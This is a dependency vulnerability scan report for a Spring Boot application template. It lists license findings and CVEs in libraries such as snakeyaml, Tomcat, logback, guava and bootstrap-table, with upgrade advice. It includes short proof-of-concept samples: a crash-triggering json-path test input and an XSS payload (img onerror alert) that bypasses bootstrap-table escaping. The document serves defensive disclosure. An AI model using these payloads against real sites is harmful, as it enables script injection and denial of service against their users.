  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2

EPL-1.0 license

medium severity

LGPL-2.0 license

  • Module: net.sf.jasperreports:jasperreports
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1

LGPL-2.0 license

medium severity

LGPL-2.1 license

  • Module: org.hibernate:hibernate-core
  • Introduced through: org.springframework.boot:spring-boot-starter-data-jpa@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.hibernate:hibernate-core@5.6.10.Final

LGPL-2.1 license

medium severity

LGPL-2.1 license

  • Module: org.hibernate.common:hibernate-commons-annotations
  • Introduced through: org.springframework.boot:spring-boot-starter-data-jpa@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.hibernate:hibernate-core@5.6.10.Final org.hibernate.common:hibernate-commons-annotations@5.1.2.Final

LGPL-2.1 license

medium severity

LGPL-3.0 license

  • Module: org.jfree:jcommon
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 org.jfree:jcommon@1.0.23
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 org.jfree:jfreechart@1.0.19 org.jfree:jcommon@1.0.23

LGPL-3.0 license

medium severity

LGPL-3.0 license

  • Module: org.jfree:jfreechart
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 org.jfree:jfreechart@1.0.19

LGPL-3.0 license

low severity

Buffer Overflow

  • Vulnerable module: com.jayway.jsonpath:json-path
  • Introduced through: org.springframework.hateoas:spring-hateoas@1.5.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 com.jayway.jsonpath:json-path@2.7.0
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.1.4.

Overview

Affected versions of this package are vulnerable to Buffer Overflow via the deprecated Criteria.parse or Criteria.where methods. An attacker can disrupt the regular operation of the application by supplying a specially crafted input that triggers a stack overflow. Exploiting this vulnerability requires insecure configurations on the server side, for example - handling requests in a one single thread.

PoC

import com.jayway.jsonpath.Criteria;
import org.junit.Test;
public class CriteriaFuzzerWhere1 {
    // Stack overflow
    @Test
    public void whereFuzzerTest() {
        try {
            Criteria result = Criteria.where("[']',");
        } catch (Exception e) {
        }
    }
}

Remediation

Upgrade com.jayway.jsonpath:json-path to version 2.9.0 or higher.

References

low severity

HTTP Request Smuggling

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.5.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.5.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to HTTP Request Smuggling when improper requests containing an invalid Content-Length header are not being properly rejected.

Note: Exploiting this vulnerability is also possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.53, 9.0.68, 10.0.27, 10.1.1 or higher.

References

low severity

Stack-based Buffer Overflow

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.32 or higher.

References

low severity

Stack-based Buffer Overflow

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow in org.yaml.snakeyaml.constructor.BaseConstructor.constructObject when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

low severity

Stack-based Buffer Overflow

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when supplied with untrusted input, due to improper limitation for incoming data.

Remediation

Upgrade org.yaml:snakeyaml to version 1.32 or higher.

References

low severity

Creation of Temporary File in Directory with Insecure Permissions

  • Vulnerable module: com.google.guava:guava
  • Introduced through: com.google.guava:guava@31.1-jre

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.google.guava:guava@31.1-jre
    Remediation: Upgrade to com.google.guava:guava@32.0.0-jre.

Overview

com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset,immutable collections, a graph library, functional types, an in-memory cache and more.

Affected versions of this package are vulnerable to Creation of Temporary File in Directory with Insecure Permissions due to the use of Java's default temporary directory for file creation in FileBackedOutputStream. Other users and apps on the machine with access to the default Java temporary directory can access the files created by this class. This more fully addresses the underlying issue described in CVE-2020-8908, by deprecating the permissive temp file creation behavior.

NOTE: Even though the security vulnerability is fixed in version 32.0.0, the maintainers recommend using version 32.0.1, as version 32.0.0 breaks some functionality under Windows.

Remediation

Upgrade com.google.guava:guava to version 32.0.0-android, 32.0.0-jre or higher.

References

low severity

Cross-site Scripting (XSS)

  • Vulnerable module: org.webjars.bower:bootstrap-table
  • Introduced through: org.webjars.bower:bootstrap-table@1.17.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.webjars.bower:bootstrap-table@1.17.1

Overview

org.webjars.bower:bootstrap-table is an extended table to integration with some of the most widely used CSS frameworks. (Supports Bootstrap, Semantic UI, Bulma, Material Design, Foundation, Vue.js).

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). A type confusion vulnerability can lead to a bypass of input sanitization when the input provided to the escapeHTML function is an array (instead of a string) even if the escape attribute is set.

PoC

<!DOCTYPE html>
<html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>BootStrap-Table</title>
    
    <link href="./node_modules/bootstrap-table/dist/bootstrap-table.min.css" rel="stylesheet">
    <script type="text/javascript" src="./node_modules/jquery/dist/jquery.js"></script>
    <script type="text/javascript" src="./node_modules/bootstrap-table/dist/bootstrap-table.js"></script>


    </head>
    <body>
        <table 
            id="table"
            data-toggle="table"
            data-escape="true"
            data-url="json/data1.json"
        >
            <thead>
              <tr>
                <th data-field="name"></th>
              </tr>
            </thead>
        </table>
    </body>
</html>

Content of json/data1.json:

[
    {
        "name": "Hello World! <img src='' onerror='alert(1)' />"
    },
    {
        "name": ["Hello World! <img src='' onerror='alert(2)' />"]
    }
]

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

There is no fixed version for org.webjars.bower:bootstrap-table.

References

low severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.8.

Overview

ch.qos.logback:logback-core is a logback-core module.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through the SaxEventRecorder process. An attacker can forge requests by compromising logback configuration files in XML.

Remediation

Upgrade ch.qos.logback:logback-core to version 1.3.15, 1.5.13 or higher.

References

low severity

Improper Handling of Case Sensitivity

  • Vulnerable module: org.springframework:spring-context
  • Introduced through: org.springframework.hateoas:spring-hateoas@1.5.1, io.springfox:springfox-swagger2@3.0.0 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
